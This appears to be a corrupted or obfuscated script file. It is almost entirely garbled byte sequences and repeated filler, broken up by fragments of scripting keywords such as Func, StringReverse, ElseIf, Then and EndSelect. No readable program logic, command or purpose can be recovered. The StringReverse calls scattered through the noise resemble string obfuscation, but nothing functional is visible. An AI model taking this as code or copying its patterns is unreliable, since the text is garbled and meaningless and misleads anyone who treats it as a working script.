Func j?I?3:0[yStringReverse?:0:[n?61##j?I?3:0[y?8:0[n?63:0[y?8:ÿ˜[n?61#j?I?3:8:0:[ngReverse?8:0:[n?61##j?I?3:0[y?8:0[n?63:0[y?8:0:[n?61#j?I?3:8:0:[n?61#j?I?3:0[y?8:0[n?63:0[y?8:0:[n?61:e¶$_:e¶$_efj?I?3:0[?I¸3:0[y?8:0[n?63:0[y?__:[n#j?I?3:0[y?8(ByR:0[n?63:0[y?ef8:?603:0[?I¸3:0[y0Then
3:0[?I?3:0[y?8:nc j?I?3:0[yStringReverse?8:0:[n?61##j?I?3:0[y?8:0[n?63:0[y?8:0:[n?61#j?I?3:8:0:[ngReverse?8:0:[n?61##j?I?3:0[y?8:0[n?[n?63:0[y?8:0:[n?61ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ#j?I?3:8:0:[n?61#j?I?3:0[y?8:0[n?63:0[y?8:0:[n?61:e¶$_:e¶$_efj?I?3:0[?I¸3:0[y?8:0[n?63:0[y?__:[n#j?I?3:0[y?8(ByR:0[n?63:0[y?ef8:?60[y?8:0[n?63:0[y?8:0:[n?61:e¶$_:e¶$`efj?I?3:0[?I?3:0[y?8:0[n?63:0[y?__:[n#j?I?3:0[y?8(ByR:0[n?63:0[y?ef8:0:[n?61:e¶$_:e¶$©š™ 0[n?63:0[y?__:[n#j?I?3:0[y?8(ByR:0[n?63:0[y?ef8:0:[n?61::0[n?63:0[y?8:0:[n?61#j?I?3:8:0:[n?61#j?I?3:0[y?8:0[n?63:0[y?8:0:[n?61:e¶$_:e¶$_efj1ThenìEndIFÜI Ifæ4ThenäEndIfäIfäIfæ1ThenäEndIfäIÜIfæ2ThenìEndIFÜf!Ifæ1ThenäEndIfô1Ifæ1ThenäEndIfÇnÜIfæ1ThenäEnd?I?3:0[?I¸3:0[y?8:0[n?63:0[y?__:[n#j?I?3:0[y?8(ByR:0[n?63:0[y?ef8:?60[y?8:0[n?63:0[y?8:0:[n?61:e¶$_:e¶$_efj?I?3:0[?I?3:0[y?8:0[n?63:0[y?__:[n#j?I?3:0[y?8(ByR:0[n?63:0[y?ef8:0:[n?61:e¶$_:e¶$©š™ 0[n?63:0[y?__:[n#j?I?3:0[y?8(ByR:0[n?63:0[y?ef8:0?3:0[y?8:nc j?I?3:0[yStringReverse?8:0:[n?61##j?I?3:0[y?8:0[n?63:0[y?8:0:[n?61#j?I?3:8:0:[ngReverse?8:0:[3:0[yStringReverse?8:0:[n?61##j?I?3:0[y?8:0[n?63:0[y?n?61#j?I?3:8:0:[ngReverse?8:0:[n?61##j?I?3:0[y?8:0[n?63:0[y?8:0:[n?61#j?I?3:8:0:[n?61#j?I?3:0[y?8:0[n?63:0[y?8:0:[n?61:eEndSelect¶$_:e¶$_efj?I?3:0[?I¸3:0[y?8:0[n?63:0[y?__:[n#j?I?3:0[y?8(ByR?ef8:?0:[n?61:e¶$_:e¶$_efj?I?3:0[?I?3:0[y?8:nc j?I?3:0[yStringReverse?8:0:[#6?j?n1#I?3:0[y?8:0[n?63:0[y?8:0:[n?61#j?I?3:8:0:[ngReverse?8:0:[3:0[yStringReverse?8:0:[n?61##j?I?3:0[y?8:0[n?63:0[y?8:0:[n?61#j?I?3:8:0:[ngReverse?8:0:[n?61##j?I?3:0[y?8n?61##j?I?3:0[y?8:0[n?63:0[y?8:0:[n?61#j?I$_efj?I?3:0[?I?3:0[y?8:nc j?I?3:0[yStringReverse?8:0:[n?61##j?I?n
ElseIf 1Then
ElseIf 0Then
ElseIf 1Then
ElseIf 0ThEn
ElseIf 0Then
ElseIf 1Then
ElseIf 0Then
ElseIf 1Then
ElseIf 0Then
ElseIf 2Then
E:0[n?63:0[y?8:0:[n?61#j?I?3:8:0:[n?61#j?I?3:0[y?8:0[n?63:0[y?8:0:[n?61:e¶$_:e¶$_efj?I?3:0[?I¸3:0[y?8:0[n?63:0[y?__:[n#j?I?3:0[y?8(ByR:0[n?63:0[y?ef8:?60[y?8:0[n?v3:0[y?8:0:[n?61:e¶$_:e¶$_efj?I?3:0[?I?3:0[y?8:0[n?63:0[y?j?I?3:8:0:[n?61#j?I?3:0[y?8:0[n?63:0[y?8:0:[n?61:e¶$_:e¶$_efj?I?3:0[?I¸3:0[y?8:0[n?63:0[y?__:[n#j?I?3:0[y?8(ByR:0[n?63:0[y?ef8:?60[y?8:0[n?v3:0[y?8:0:[n?61:e¶$_:e¶$_efj?I?3:0[?I?3:0[y?8:0[n?63:0[y?__:[n#j?I?3:0[y?8(ByR:0[n?63:0[y?ef]ÿÿÿ8:0:[n?61:e¶$_:e¶$©š™ 0[n?63:0[y?__:[n#j?I?3:0[y?8(ByR:0[n?63:0[y?ef8:0:[n?61::0[n?63:0[y?8:0:[n?61#j?I?3:8:0:[n?61#j?I?3:0[y?8:0[n?63:0[y?8:0:[n?61:e¶$_:e¶$_efj?I?3:0[?I¸3:0[y?8:0[n?63:0[y?__:[n#j?I?3:0[y?8(ByR:0[n?63:0[y?ef8:?60[y?8:0[n?63:0[y?8:0:[n?61:e¶$_:e¶$_efj?I?3:0[?I?3:0[y?8:0[n?63:0[y?__:[n#j?I?3:0[y?8(ByR:0[n?63:0[y?ef8:0:[n?61:e¶$_:e¶$©š™ 0[n?63:0[y?__:[n#j?I?3:0[y?8(ByR:0[n?63:0[y?ef8:0:[n?61:e¶$_:e¶$©š™ _